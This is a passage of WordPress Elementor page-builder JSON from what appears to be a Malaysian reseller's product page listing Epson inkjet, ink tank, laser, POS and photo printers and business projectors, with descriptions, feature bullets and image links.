Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"42\",\"right\":\"42\",\"bottom\":\"42\",\"left\":\"42\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER 